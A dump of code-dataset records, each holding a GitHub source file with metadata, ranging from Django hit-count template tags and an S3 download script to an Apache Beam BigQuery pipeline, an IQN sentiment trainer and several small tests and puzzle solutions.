'http://bangumi.bilibili.com/web_api/season/index_global?page=%s&page_size=20&version=0&is_finish=0&start_year={}&tag_id=&index_type=1&index_sort=0&quarter={}'.format(year, month)\n channels.insert_one({\n 'url': channel,\n 'year': year,\n 'month': months[month],\n })\n channels.insert_one({\n 'url': 'http://bangumi.bilibili.com/web_api/season/index_global?page=%s&page_size=20&version=0&is_finish=0&start_year=2017&tag_id=&index_type=1&index_sort=0&quarter=1',\n 'year': 2017,\n 'month': 1,\n })\n\n\nget_channel_urls()","repo_name":"Paul-Pcd/Anime","sub_path":"tools/channel_extracing.py","file_name":"channel_extracing.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"19282122550","text":"from collections import namedtuple\n\nfrom django import template\nfrom django.contrib.contenttypes.models import ContentType\ntry:\n from django.core.urlresolvers import reverse\nexcept ImportError:\n from django.urls import reverse\n\nfrom hitcount.utils import get_hitcount_model\n\n\nregister = template.Library()\n\n\ndef get_hit_count_from_obj_variable(context, obj_variable, tag_name):\n \"\"\"\n Helper function to return a HitCount for a given template object variable.\n\n Raises TemplateSyntaxError if the passed object variable cannot be parsed.\n \"\"\"\n error_to_raise = template.TemplateSyntaxError(\n \"'%(a)s' requires a valid individual model variable \"\n \"in the form of '%(a)s for [model_obj]'.\\n\"\n \"Got: %(b)s\" % {'a': tag_name, 'b': obj_variable}\n )\n\n try:\n obj = obj_variable.resolve(context)\n except template.VariableDoesNotExist:\n raise error_to_raise\n\n try:\n ctype = ContentType.objects.get_for_model(obj)\n except AttributeError:\n raise error_to_raise\n\n hit_count, created = get_hitcount_model().objects.get_or_create(\n content_type=ctype, object_pk=obj.pk)\n\n return hit_count\n\n\ndef return_period_from_string(arg):\n \"\"\"\n Takes a string such as \"days=1,seconds=30\" and strips the quotes\n and returns a dictionary with the key/value pairs\n\n \"\"\"\n 
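# For example, '\"days=1,minutes=30\"' parses to {'days': 1, 'minutes': 30};\n    # GetHitCount.render() expands it as hit_count.hits_in_last(**period), i.e.\n    # as datetime.timedelta keyword arguments.\n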
period = {}\n\n if arg[0] == '\"' and arg[-1] == '\"':\n opt = arg[1:-1] # remove quotes\n else:\n opt = arg\n\n for o in opt.split(\",\"):\n key, value = o.split(\"=\")\n period[str(key)] = int(value)\n\n return period\n\n\nclass GetHitCount(template.Node):\n\n def handle_token(cls, parser, token):\n args = token.contents.split()\n\n # {% get_hit_count for [obj] %}\n if len(args) == 3 and args[1] == 'for':\n return cls(obj_as_str=args[2])\n\n # {% get_hit_count for [obj] as [var] %}\n elif len(args) == 5 and args[1] == 'for' and args[3] == 'as':\n return cls(obj_as_str=args[2],\n as_varname=args[4],)\n\n # {% get_hit_count for [obj] within [\"days=1,minutes=30\"] %}\n elif len(args) == 5 and args[1] == 'for' and args[3] == 'within':\n return cls(obj_as_str=args[2],\n period=return_period_from_string(args[4]))\n\n # {% get_hit_count for [obj] within [\"days=1,minutes=30\"] as [var] %}\n elif len(args) == 7 and args[1] == 'for' and \\\n args[3] == 'within' and args[5] == 'as':\n return cls(obj_as_str=args[2],\n as_varname=args[6],\n period=return_period_from_string(args[4]))\n\n else: # TODO - should there be more troubleshooting prior to bailing?\n raise template.TemplateSyntaxError(\n \"'get_hit_count' requires \"\n \"'for [object] in [period] as [var]' (got %r)\" % args\n )\n\n handle_token = classmethod(handle_token)\n\n def __init__(self, obj_as_str, as_varname=None, period=None):\n self.obj_variable = template.Variable(obj_as_str)\n self.as_varname = as_varname\n self.period = period\n\n def render(self, context):\n hit_count = get_hit_count_from_obj_variable(context, self.obj_variable, 'get_hit_count')\n\n if self.period: # if user sets a time period, use it\n try:\n hits = hit_count.hits_in_last(**self.period)\n except TypeError:\n raise template.TemplateSyntaxError(\n \"'get_hit_count for [obj] within [timedelta]' requires \"\n \"a valid comma separated list of timedelta arguments. \"\n \"For example, ['days=5,hours=6']. 
\"\n \"Got these instead: %s\" % self.period\n )\n else:\n hits = hit_count.hits\n\n if self.as_varname: # if user gives us a variable to return\n context[self.as_varname] = str(hits)\n return ''\n else:\n return str(hits)\n\n\ndef get_hit_count(parser, token):\n \"\"\"\n Returns hit counts for an object.\n\n - Return total hits for an object:\n {% get_hit_count for [object] %}\n\n - Get total hits for an object as a specified variable:\n {% get_hit_count for [object] as [var] %}\n\n - Get total hits for an object over a certain time period:\n {% get_hit_count for [object] within [\"days=1,minutes=30\"] %}\n\n - Get total hits for an object over a certain time period as a variable:\n {% get_hit_count for [object] within [\"days=1,minutes=30\"] as [var] %}\n\n The time arguments need to follow datetime.timedelta's limitations:\n Accepts days, seconds, microseconds, milliseconds, minutes,\n hours, and weeks.\n\n \"\"\"\n return GetHitCount.handle_token(parser, token)\n\nregister.tag('get_hit_count', get_hit_count)\n\n\nclass WriteHitCountJavascriptVariables(template.Node):\n\n def handle_token(cls, parser, token):\n args = token.contents.split()\n\n if len(args) == 3 and args[1] == 'for':\n return cls(obj_variable=args[2])\n\n else:\n raise template.TemplateSyntaxError(\n 'insert_hit_count_js_variables requires this syntax: '\n '\"insert_hit_count_js_variables for [object]\"\\n'\n 'Got: %s' % ' '.join(str(i) for i in args)\n )\n\n handle_token = classmethod(handle_token)\n\n def __init__(self, obj_variable):\n self.obj_variable = template.Variable(obj_variable)\n\n def render(self, context):\n hit_count = get_hit_count_from_obj_variable(context, self.obj_variable, 'insert_hit_count_js_variables')\n\n js = '\"\n\n return js\n\n\ndef insert_hit_count_js_variables(parser, token):\n \"\"\"\n Injects JavaScript global variables into your template. These variables\n can be used in your JavaScript files to send the correctly mapped HitCount\n ID to the server (see: hitcount-jquery.js for an example).\n\n {% insert_hit_count_js_variables for [object] %}\n \"\"\"\n return WriteHitCountJavascriptVariables.handle_token(parser, token)\n\nregister.tag('insert_hit_count_js_variables', insert_hit_count_js_variables)\n\n\nclass GetHitCountJavascriptVariables(template.Node):\n\n def handle_token(cls, parser, token):\n args = token.contents.split()\n\n if len(args) == 5 and args[1] == 'for' and args[3] == 'as':\n return cls(obj_variable=args[2], as_varname=args[4])\n\n else:\n raise template.TemplateSyntaxError(\n 'get_hit_count_js_variables requires this syntax: '\n '\"get_hit_count_js_variables for [object] as [var_name].\"\\n'\n 'Got: %s' % ' '.join(str(i) for i in args)\n )\n\n handle_token = classmethod(handle_token)\n\n def __init__(self, obj_variable, as_varname):\n self.obj_variable = template.Variable(obj_variable)\n self.as_varname = as_varname\n\n def render(self, context):\n HitcountVariables = namedtuple('HitcountVariables', 'pk ajax_url hits')\n\n hit_count = get_hit_count_from_obj_variable(context, self.obj_variable, 'get_hit_count_js_variables')\n\n context[self.as_varname] = HitcountVariables(\n hit_count.pk, str(reverse('hitcount:hit_ajax')), str(hit_count.hits))\n\n return ''\n\n\ndef get_hit_count_js_variables(parser, token):\n \"\"\"\n Injects JavaScript global variables into your template. 
These variables\n can be used in your JavaScript files to send the correctly mapped HitCount\n ID to the server (see: hitcount-jquery.js for an example).\n\n {% get_hit_count_js_variables for [object] as [var_name] %}\n\n Will provide two variables:\n [var_name].pk = the hitcount pk to be sent via JavaScript\n [var_name].ajax_url = the relative url to post the ajax request to\n \"\"\"\n return GetHitCountJavascriptVariables.handle_token(parser, token)\n\nregister.tag('get_hit_count_js_variables', get_hit_count_js_variables)\n\n\nclass WriteHitCountJavascript(template.Node):\n\n JS_TEMPLATE = \"\"\"\n\n\"\"\"\n\n JS_TEMPLATE_DEBUG = \"\"\"\n\n\"\"\"\n\n def handle_token(cls, parser, token):\n args = token.contents.split()\n\n if len(args) == 3 and args[1] == 'for':\n return cls(obj_variable=args[2], debug=False)\n elif len(args) == 4 and args[1] == 'for' and args[3] == 'debug':\n return cls(obj_variable=args[2], debug=True)\n else:\n raise template.TemplateSyntaxError(\n 'insert_hit_count_js requires this syntax: '\n '\"insert_hit_count_js for [object]\"\\n'\n '\"insert_hit_count_js for [object] debug\"'\n 'Got: %s' % ' '.join(str(i) for i in args)\n )\n\n handle_token = classmethod(handle_token)\n\n def __init__(self, obj_variable, debug):\n self.obj_variable = template.Variable(obj_variable)\n self.debug = debug\n\n def render(self, context):\n hit_count = get_hit_count_from_obj_variable(\n context,\n self.obj_variable,\n 'insert_hit_count_js'\n )\n template = self.JS_TEMPLATE_DEBUG if self.debug else self.JS_TEMPLATE\n return template % (str(reverse('hitcount:hit_ajax')), str(hit_count.pk))\n\n\ndef insert_hit_count_js(parser, token):\n \"\"\"\n Injects the JavaScript into your template that works with jquery.postcsrf.js.\n\n {% insert_hit_count_js_variables for [object] %}\n \"\"\"\n return WriteHitCountJavascript.handle_token(parser, token)\n\n\nregister.tag('insert_hit_count_js', insert_hit_count_js)\n","repo_name":"thornomad/django-hitcount","sub_path":"hitcount/templatetags/hitcount_tags.py","file_name":"hitcount_tags.py","file_ext":"py","file_size_in_byte":10280,"program_lang":"python","lang":"en","doc_type":"code","stars":449,"dataset":"github-code","pt":"35"} +{"seq_id":"34453757488","text":"import argparse\nimport json\nimport os\nimport shutil\nimport boto3\nimport numpy as np\nimport pandas as pd\n\nDATA_DIR = \"/opt/dkube/input\"\nconfig = json.load(open(os.path.join(DATA_DIR, \"config.json\")))\nwith open(os.path.join(DATA_DIR, \"credentials\"), \"r\") as f:\n creds = f.read()\naccess_key = creds.split(\"\\n\")[1].split(\"=\")[-1].strip()\nsecret_key = creds.split(\"\\n\")[2].split(\"=\")[-1].strip()\n\nsession = boto3.session.Session()\ns3_client = boto3.resource(\n service_name=\"s3\",\n aws_access_key_id=access_key,\n aws_secret_access_key=secret_key,\n endpoint_url=config[\"Endpoint\"],\n)\n\nmy_bucket = s3_client.Bucket(config[\"Bucket\"])\ns3_client.Bucket(config[\"Bucket\"]).download_file(\n \"CMU-1/Data0000.dat\", \"Data0000.dat\"\n)\n\nshutil.copy(\"Data0000.dat\", \"/output-dataset-tc\")\n","repo_name":"pallavipannu/pipelines","sub_path":"storageop-tc/download_data.py","file_name":"download_data.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"24131926239","text":"from brownie import ApeSchool, accounts\n\ndef test_deploy():\n account = accounts[0]\n\n ape_school = ApeSchool.deploy({\n \"from\": account\n })\n ape_favourite_number = 
ape_school.getApeFavouriteNumber(\"Mary\")\n expected = 0\n \n assert ape_favourite_number == expected\n\ndef test_add_ape():\n account = accounts[0]\n ape_school = ApeSchool.deploy({\n \"from\": account\n })\n\n expected = 7\n # have to add from account\n transaction = ape_school.addApe(\"Mary\", 7, {\"from\": account})\n transaction.wait(1)\n\n assert ape_school.getApeFavouriteNumber(\"Mary\") == expected\n","repo_name":"ckt22/solidity-playground","sub_path":"brownie-playground/tests/test_ape_school.py","file_name":"test_ape_school.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35510521211","text":"from datetime import timedelta \n\nfrom airflow import DAG\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.utils.dates import days_ago\n\ndef hello_world():\n print(\"hello world!\")\n\n\ndef hello_airflow():\n print(\"hello airflow!\")\n\ndefault_args = {\n 'owner': 'airflow',\n 'start_date': days_ago(2),\n 'concurrency': 1,\n 'retries': 0\n}\n\ndag = DAG(\"first_dag\",\n default_args=default_args,\n schedule_interval=timedelta(days = 1)\n ) \n\n\nt1 = PythonOperator(task_id='hello_world',\n python_callable=hello_world,\n dag = dag)\n\nt2 = PythonOperator(task_id=\"hello_airflow\",\n python_callable=hello_airflow,\n dag = dag)\n\nt1 >> t2\n","repo_name":"pkmklong/airflow-review","sub_path":"airflow_home/pwd/dags/first_dag.py","file_name":"first_dag.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"28248729142","text":"# The text file contains only uppercase Latin letters (ABC…Z).\n# Determine the maximum number of consecutive characters among which there is at most one letter A.\n# https://inf-ege.sdamgia.ru/problem?id=38958\n\nf = open(\"38958.txt\", \"r\").read()\nmylist = []\nmaxx = 0\n\nfor i, j in enumerate(f):\n if j == \"A\":\n mylist.append(i)\n \nfor i in range(2, len(mylist)-1):\n maxx = max(maxx, mylist[i] - mylist[i-2] - 1)\n\nprint(maxx)\n","repo_name":"paracosm17/egeinformatics","sub_path":"24/38958/38958.py","file_name":"38958.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"71053572901","text":"from oncotator.utils.ConfigUtils import ConfigUtils\nfrom oncotator.utils.MutUtils import MutUtils\n\n\nclass FieldMapCreator(object):\n \"\"\"Generic class for creating a mapping of field name to an annotation name. Under the hood this is a simple dict.\n \"\"\"\n\n @staticmethod\n def choose_best_annotation(header, m, alternative_dict, deprioritize_input_annotations):\n \"\"\" Choose the best annotation in mut for the given header.\n :param header: header in the output.
For example, a column in a TCGA MAF\n :param m: mutation -- for reference into available annotations\n :param alternative_dict: dict with mapping from column names to acceptable annotations.\n :param deprioritize_input_annotations: If an annotation has been sourced as \"INPUT\", whether we should try to\n choose another alias?\n :return: if no suitable annotation, None\n \"\"\"\n\n annotation_names = sorted(list(set(m.keys() + m.getAttributeNames())))\n hdr = header.lower()\n alternatives = alternative_dict.get(hdr, [])\n full_possibilities = [header] + alternatives\n result = None\n\n if not deprioritize_input_annotations:\n for p in full_possibilities:\n if p in annotation_names:\n result = p\n break\n else:\n second_choice = None\n for p in full_possibilities:\n if p in annotation_names and m.getAnnotation(p).getDatasource() != \"INPUT\":\n return p\n if second_choice is None and p in annotation_names:\n second_choice = p\n\n result = second_choice\n\n return result\n\n\n @staticmethod\n def create_field_map(headers, m, alternative_dict, is_render_internal_fields=True,\n exposed_fields=None, prepend=\"i_\", deprioritize_input_annotations=False,\n additional_columns=None):\n \"\"\"\n Create a mapping for output header to the best input annotation.\n\n This can handle prepend fields (attach the prepend to internal fields), exposed fields (ones not in the list of headers, but should not have a prepend),\n\n :param additional_columns: a list of additional columns not found in the mutation nor the headers. These will\n be considered internal fields with annotations of the exact same name.\n :type additional_columns list\n :param is_render_internal_fields: Whether annotations not assigned to headers (or superseded by other annotations) should be included in this map.\n :type is_render_internal_fields bool\n :param exposed_fields: list of fields that, if found, should never receive a prepend.\n :param prepend: The prepend to put on internal fields, if any are detected. If is_render_internal_fields is False, this parameter does nothing.\n :param deprioritize_input_annotations: If an annotation with the exact name of the header is found AND it has a datasource of \"INPUT\",\n use one the annotations instead. This is useful in cases where we want to reannotate. This effectively handles aliases.\n :param headers: List of headers that need to be populated for rendering. For example, the columns in a TCGA MAF\n :param m: MutationData to scrape available annotations\n :param alternative_dict: Dictionary of header to list of annotations. Usually, created from a config file.\n :return: dict of header:annotation name (one annotation name) that should be used for this output rendering.\n \"\"\"\n result = dict()\n if prepend is None:\n prepend = \"\"\n\n if exposed_fields is None:\n exposed_fields = set()\n\n # Process each header and find the first alias. 
If an annotation exists with the exact same name as the header\n # use that unless deprioritization is in effect.\n annotation_names = MutUtils.get_all_annotation_names(m)\n\n for h in headers:\n choice = FieldMapCreator.choose_best_annotation(h, m, alternative_dict, deprioritize_input_annotations)\n if choice is None:\n choice = h\n result[h] = choice\n\n # Now populate internal fields, if requested.\n if is_render_internal_fields:\n\n if additional_columns is None:\n additional_columns = []\n\n annotation_names_used = result.values()\n internal_field_dict = dict()\n sAnnotations = set(annotation_names)\n internal_fields = sAnnotations.difference(annotation_names_used)\n internal_fields = internal_fields.union(set(additional_columns))\n\n # Create a dict to do a lookup of annotation to the column to use.\n reverseAlternativeDict = ConfigUtils.buildReverseAlternativeDictionary(alternative_dict)\n\n for i in internal_fields:\n if i.startswith('_') or i == \"transcripts\":\n continue\n\n no_prepend_name = i\n if prepend != \"\" and i.startswith(prepend):\n no_prepend_name = i.replace(prepend, \"\")\n\n field_alt_dict = {i: [prepend+i, no_prepend_name]}\n choice = FieldMapCreator.choose_best_annotation(i, m, field_alt_dict, deprioritize_input_annotations)\n if choice is None:\n choice = i\n key_to_use = reverseAlternativeDict.get(i,i)\n if prepend.strip() == \"\" or i.startswith(prepend) or i in exposed_fields:\n internal_field_dict[key_to_use] = choice\n else:\n internal_field_dict[prepend + key_to_use] = choice\n\n result.update(internal_field_dict)\n\n return result\n","repo_name":"broadinstitute/oncotator","sub_path":"oncotator/utils/FieldMapCreator.py","file_name":"FieldMapCreator.py","file_ext":"py","file_size_in_byte":5794,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"35"} +{"seq_id":"31597136112","text":"from .provider_test import ProviderTest\nfrom gunpowder import *\nimport time\n\n\nclass DelayNode(BatchFilter):\n def __init__(self, time_prepare, time_process):\n self.time_prepare = time_prepare\n self.time_process = time_process\n\n def prepare(self, request):\n time.sleep(self.time_prepare)\n\n deps = request\n return deps\n\n def process(self, batch, request):\n time.sleep(self.time_process)\n\n\nclass TestProfiling(ProviderTest):\n def test_profiling(self):\n pipeline = (\n self.test_source\n + DelayNode(0.1, 0.2)\n + PrintProfilingStats(every=2)\n + DelayNode(0.2, 0.3)\n )\n\n with build(pipeline):\n for i in range(5):\n batch = pipeline.request_batch(self.test_request)\n\n profiling_stats = batch.profiling_stats\n\n summary = profiling_stats.get_timing_summary(\"DelayNode\", \"prepare\")\n\n # is the timing for each pass correct?\n self.assertGreaterEqual(summary.min(), 0.1)\n self.assertLessEqual(summary.min(), 0.2 + 0.1) # bit of tolerance\n\n summary = profiling_stats.get_timing_summary(\"DelayNode\", \"process\")\n\n self.assertGreaterEqual(summary.min(), 0.2)\n self.assertLessEqual(summary.min(), 0.3 + 0.1) # bit of tolerance\n\n # is the upstream time correct?\n self.assertGreaterEqual(\n profiling_stats.span_time(), 0.1 + 0.2 + 0.2 + 0.3\n ) # total time spend upstream\n self.assertLessEqual(\n profiling_stats.span_time(), 0.1 + 0.2 + 0.2 + 0.3 + 0.1\n ) # plus bit of tolerance\n","repo_name":"funkelab/gunpowder","sub_path":"tests/cases/profiling.py","file_name":"profiling.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"35"} 
+{"seq_id":"71836616742","text":"# General imports\nimport time\nimport apache_beam as beam\nfrom apache_beam.options.pipeline_options import PipelineOptions\nfrom apache_beam.io import WriteToBigQuery\nfrom apache_beam.runners import DirectRunner#, DataflowRunner\nfrom apache_beam.io.gcp.bigquery import bigquery_tools\nimport argparse\nimport logging\nimport json\nimport subprocess\n\n## Local imports\nfrom pipeline_trial.custom_fns import etl\nfrom pipeline_trial.custom_fns import utils\n\n# Define the pipeline\ndef run(argv=None, save_main_session=False):\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--project',\n required=True,\n dest = 'project',\n help='The project id where magic happens.')\n parser.add_argument(\n '--bucket',\n required=True,\n dest = 'bucket',\n help='The bucket name where the files are stored.')\n parser.add_argument(\n '--parquetpath',\n required=True,\n dest = 'parquetpath',\n help='The file path for the new parquet files.')\n parser.add_argument(\n '--dataset',\n required=True,\n dest='dataset',\n help='The BigQuery dataset where data is gonna be stored.')\n parser.add_argument(\n '--table',\n required=True,\n dest='table',\n help='The BigQuery table to store the data.')\n \n args, beam_args = parser.parse_known_args(argv)\n\n try:\n # bq show --format=prettyjson PROJECT_ID:DATASET_NAME.TABLE_NAME > schema_downloaded.json\n subprocess.run([\"bq\", \"show\", \"--format=prettyjson\", f\"{args.project}:{args.dataset}.{args.table}\"], stdout=open(\"./schema_downloaded.json\", \"w\"))\n table_schema = bigquery_tools.parse_table_schema_from_json(json.dumps(json.load(open(\"./schema_downloaded.json\"))[\"schema\"]))\n except:\n table_schema = bigquery_tools.parse_table_schema_from_json(json.dumps(json.load(open(\"./schema_original.json\"))[\"schema\"]))\n\n beam_options = PipelineOptions(beam_args, save_main_session=save_main_session)\n\n full_file_path = args.bucket + '/'\n\n while True:\n new_files = utils.get_new_files(args.project, args.bucket, args.dataset, args.parquetpath)\n\n if len(new_files) == 0:\n print(f\"No new files found. Exiting pipeline\")\n break\n else:\n print('Total files founded: ' + str(len(new_files)))\n print('Starting pipeline...')\n for file_name in new_files:\n print(f\"Processing new file: {file_name}\")\n\n with beam.Pipeline(runner=DirectRunner(), options=beam_options) as p:\n (\n p\n | 'Reading the Parquetfile' >> beam.io.ReadFromParquetBatched(full_file_path + file_name, columns=['business_id', 'attributes'])\n | 'Converting to Pandas' >> beam.Map(lambda table: table.to_pandas())\n | 'Cleaning and transforming data' >> beam.FlatMap(etl.clean_attributes)\n | 'Uploading to BigQuery' >> WriteToBigQuery(\n table=args.table,\n dataset=args.dataset,\n project=args.project,\n schema=table_schema,\n create_disposition=beam.io.BigQueryDisposition.CREATE_IF_NEEDED,\n write_disposition=beam.io.BigQueryDisposition.WRITE_TRUNCATE,\n batch_size=int(100)\n )\n )\n\n print('Done processing file: ' + file_name)\n utils.update_processed_files(file_name, args.project, args.dataset)\n\n print(f'Done processing all files. 
Checking for new files and exiting if no new files are founded')\n\nif __name__ == \"__main__\":\n logging.getLogger().setLevel(logging.WARNING)\n run()","repo_name":"maicobernal/dataflow","sub_path":"pipeline_trial/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":3854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73320756582","text":"from typing import List\n\n\nclass Solution:\n def solve(self, board: List[List[str]]) -> None:\n \"\"\"\n Do not return anything, modify board in-place instead.\n \"\"\"\n total_rows, total_cols = len(board), len(board[0])\n directions = [(-1, 0), (1, 0), (0, -1), (0, 1)]\n visited = set()\n\n def depth_first_search(x, y):\n\n for dx, dy in directions:\n position_x, position_y = x+dx, y+dy\n\n if 0 <= position_x < total_rows and 0 <= position_y < total_cols and board[position_x][position_y] == \"O\" and (position_x, position_y) not in visited:\n visited.add((position_x, position_y))\n board[position_x][position_y] = \"#\"\n depth_first_search(position_x, position_y)\n\n for x in range(total_rows):\n for y in range(total_cols):\n if (x == 0 or x == total_rows-1 or y == 0 or y == total_cols-1) and board[x][y] == \"O\" and (x, y) not in visited:\n visited.add((x, y))\n board[x][y] = \"#\"\n depth_first_search(x, y)\n\n for x in range(total_rows):\n for y in range(total_cols):\n if board[x][y] == \"O\":\n board[x][y] = \"X\"\n elif board[x][y] == \"#\":\n board[x][y] = \"O\"\n\n\nif __name__ == \"__main__\":\n ex = Solution()\n board = [[\"X\", \"X\", \"X\", \"X\"], [\"X\", \"O\", \"O\", \"X\"],\n [\"X\", \"X\", \"O\", \"X\"], [\"X\", \"O\", \"X\", \"X\"]]\n ex.solve(board)\n sol = [[\"X\", \"X\", \"X\", \"X\"], [\"X\", \"X\", \"X\", \"X\"],\n [\"X\", \"X\", \"X\", \"X\"], [\"X\", \"O\", \"X\", \"X\"]]\n for board_elem, sol_elem in zip(board, sol):\n assert board_elem == sol_elem\n\n board = [[\"O\", \"X\", \"X\", \"O\", \"X\"], [\"X\", \"O\", \"O\", \"X\", \"O\"], [\n \"X\", \"O\", \"X\", \"O\", \"X\"], [\"O\", \"X\", \"O\", \"O\", \"O\"], [\"X\", \"X\", \"O\", \"X\", \"O\"]]\n ex.solve(board)\n sol = [[\"O\", \"X\", \"X\", \"O\", \"X\"], [\"X\", \"X\", \"X\", \"X\", \"O\"], [\n \"X\", \"X\", \"X\", \"O\", \"X\"], [\"O\", \"X\", \"O\", \"O\", \"O\"], [\"X\", \"X\", \"O\", \"X\", \"O\"]]\n\n for board_elem, sol_elem in zip(board, sol):\n assert board_elem == sol_elem\n","repo_name":"gbrunofranco/leetcode","sub_path":"Python/130.py","file_name":"130.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"11946167024","text":"r = []\nfor _ in range(2*int(input())):\n line = input()\n if not line:\n continue\n for c in (\"(\", \")\", \"+\", \"-\", \"*\"):\n line = line.replace(c, \"\")\n line = line.lstrip(\"0\")\n if not line:\n r.append(\"0\")\n else:\n r.append(line)\nprint(\"\\n\".join(r))\n","repo_name":"bradyz/sandbox","sub_path":"challenges/ipsc/g.py","file_name":"g.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"8486073742","text":"import os\nimport numpy as np\nfrom glob import glob\n\nimport torch.optim as optim\nimport torch\n\nfrom model import IQN\n\nfrom torch.utils.tensorboard import SummaryWriter\n\n\nclass Trainer:\n def __init__(self, args, text_vectors, vocab_size, train_dl):\n\n self.log_path = os.path.join('.', 'logs',\n str(args.num_quantile) + '_' + 
str(args.gamma))\n self.summary_path = os.path.join(self.log_path, 'summary')\n\n if not os.path.exists(self.summary_path):\n os.makedirs(self.summary_path)\n\n self.writer = SummaryWriter(log_dir=self.summary_path)\n\n self.train_dl = train_dl\n\n self.target_update_freq = args.target_update_freq\n self.evaluation_freq = args.evaluation_freq\n self.network_save_freq = args.network_save_freq\n\n self.device = args.device\n self.gamma = args.gamma\n self.num_actions = args.num_actions\n\n # quantile\n self.num_quantile = args.num_quantile\n\n self.epochs = 0\n self.epoch_loss = 0\n self.epi_rewards = 0\n\n # vocab_size = len(TEXT.vocab.freqs)\n self.model = IQN(text_vectors, vocab_size, args.embedding_dim, args.n_filters,\n args.filter_sizes, args.pad_idx,\n n_actions=args.num_actions,\n n_quant=self.num_quantile,\n rnn=args.rnn).to(args.device)\n self.target_model = IQN(text_vectors, vocab_size, args.embedding_dim, args.n_filters,\n args.filter_sizes, args.pad_idx,\n n_actions=args.num_actions,\n n_quant=self.num_quantile,\n rnn=args.rnn).to(args.device)\n\n self.target_model.load_state_dict(self.model.state_dict())\n\n self.optimizer = optim.Adam(self.model.parameters(), lr=args.learning_rate)\n self.scheduler = optim.lr_scheduler.CosineAnnealingLR(self.optimizer, 1000)\n\n def run(self):\n while True:\n self.epoch_loss = 0\n self.epochs += 1 \n self.model.train()\n\n self.scheduler.step()\n if self.epochs % 10 == 0:\n print(self.scheduler.get_lr()[0])\n\n self.train_episode()\n\n # update target_model\n if self.epochs % self.target_update_freq == 0:\n self.target_model.load_state_dict(self.model.state_dict())\n\n if self.epochs % self.evaluation_freq == 0:\n self.model.eval()\n self.evaluation(self.train_dl)\n\n if self.epochs % self.network_save_freq == 0:\n self.save_model()\n\n self.log()\n\n def train_episode(self):\n for batch in self.train_dl:\n states = batch['State'].to(self.device)\n next_states = batch['Next_State'].to(self.device)\n rewards = torch.round(batch['Reward'].to(self.device))\n\n self.train(states, next_states, rewards)\n\n def train(self, states, next_states, rewards):\n curr_q, tau, _ = self.model(states)\n # curr_q = curr_q.repeat(1, 1, self.num_quantile)\n\n # target_q\n with torch.no_grad():\n if self.gamma == 0.0:\n target_q = rewards.reshape(-1, 1)\n target_q = target_q.repeat(1, self.num_quantile)\n else:\n next_q, _, _ = self.target_model(next_states)\n next_q = next_q.squeeze(2)\n\n target_q = rewards.reshape(-1, 1) + self.gamma * next_q\n target_q = target_q.unsqueeze(1)\n # target_q = target_q.unsqueeze(2)\n # target_q = target_q.repeat(1, 1, self.num_quantile)\n # target_q = target_q.permute(0, 2, 1)\n\n # (BATCH, N_QUANT, N_QUANT)\n tau = tau.repeat(1, 1, self.num_quantile)\n\n diff = target_q - curr_q\n\n loss = self.huber(diff)\n\n I_delta = (diff<0).double()\n loss *= torch.abs(tau - I_delta).detach()\n\n # huber loss\n loss = torch.mean(torch.sum(torch.mean(loss, dim=2), dim=1))\n\n # Optimize the model\n self.optimizer.zero_grad()\n loss.backward()\n # for param in self.model.parameters():\n # param.grad.data.clamp_(-1, 1)\n self.optimizer.step()\n\n self.epoch_loss += loss.item()\n\n def evaluation(self, dl):\n epi_rewards = 0\n dist_hist = []\n rewards_hist = []\n\n for batch in dl:\n states = batch['State'].to(self.device)\n rewards = batch['Reward'].to(self.device)\n\n with torch.no_grad():\n dist, _, _ = self.model(states)\n dist = dist.squeeze(2)\n dist_hist.append(dist.cpu().detach().numpy())\n 
rewards_hist.append(rewards.cpu().detach().numpy())\n # print(dist.shape)\n _mean = dist.sum(dim=1)\n actions = torch.where(\n _mean > 0,\n torch.LongTensor([1]).to(self.device),\n torch.LongTensor([0]).to(self.device))\n # print(actions.shape, ' ', rewards.shape)\n epi_rewards += (actions * rewards).detach().cpu().numpy().sum()\n\n self.epi_rewards = epi_rewards\n\n print(' '*20,\n 'train_reward: ', epi_rewards)\n \n return dist_hist, rewards_hist\n\n def huber(self, x):\n cond = (x.abs() < 1.0).float().detach()\n return 0.5 * x.pow(2) * cond + (x.abs() - 0.5) * (1.0 - cond)\n\n def log(self):\n print('epoch: ', self.epochs,\n ' loss: {:.3f}'.format(self.epoch_loss))\n\n self.writer.add_scalar(\"loss\", self.epoch_loss, self.epochs)\n self.writer.add_scalar(\"epi_rewards\", self.epi_rewards, self.epochs)\n\n def save_model(self):\n torch.save(self.model.state_dict(), os.path.join(self.log_path, str(self.epochs))+'.pt')\n\n def load_model(self):\n model_path = sorted(glob(os.path.join(self.log_path, '*.pt')))[-1]\n self.model.load_state_dict(torch.load(model_path))\n\n def __del__(self):\n self.writer.close()\n","repo_name":"ShogoAkiyama/rltorch2","sub_path":"sentiment/iqn/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":6160,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"2141453307","text":"import inspect\nimport logging\n\nclass BaseClass:\n def getLogger(self):\n\n loggerName = inspect.stack()[1][3]#improvement to properly display test_ methods in logs when using this method as inherited.\n logger = logging.getLogger(loggerName) # 